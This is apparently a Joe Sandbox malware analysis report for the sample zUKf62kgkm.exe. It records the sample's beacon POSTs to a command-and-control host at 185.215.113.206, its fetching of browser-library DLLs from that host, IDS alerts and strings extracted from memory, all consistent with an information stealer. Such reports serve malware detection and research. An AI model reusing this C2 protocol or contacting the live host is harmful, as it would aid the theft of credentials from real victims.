Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 2d 2d 0d 0a Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="message"ybncbhylepme------GHJEGCAEGIIIDHIEBKEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKEHJDHJKFIECAAKFIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IJKKEHJDHJKFIECAAKFI--
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49731 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49756 -> 185.215.113.206:80
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 923sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000906000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllf
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll5
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllf
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllh
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllS
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllB
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000906000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll-
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000906000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllg
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dlll
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php3I
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php5
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpY
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpf
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phprowser
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpser
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_75.3.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: zUKf62kgkm.exe, zUKf62kgkm.exe, 00000000.00000002.2101456032.000000006C4CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: zUKf62kgkm.exe, 00000000.00000002.2101265639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_78.3.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_78.3.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_78.3.dr, chromecache_75.3.dr String found in binary or memory: https://apis.google.com
Source: zUKf62kgkm.exe, 00000000.00000002.2097582422.000000000B6F2000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: zUKf62kgkm.exe, 00000000.00000002.2097582422.000000000B6F2000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_78.3.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_78.3.dr String found in binary or memory: https://content.googleapis.com
Source: zUKf62kgkm.exe, 00000000.00000002.2097582422.000000000B6F2000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: zUKf62kgkm.exe, 00000000.00000002.2097582422.000000000B6F2000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chromecache_78.3.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_75.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_75.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
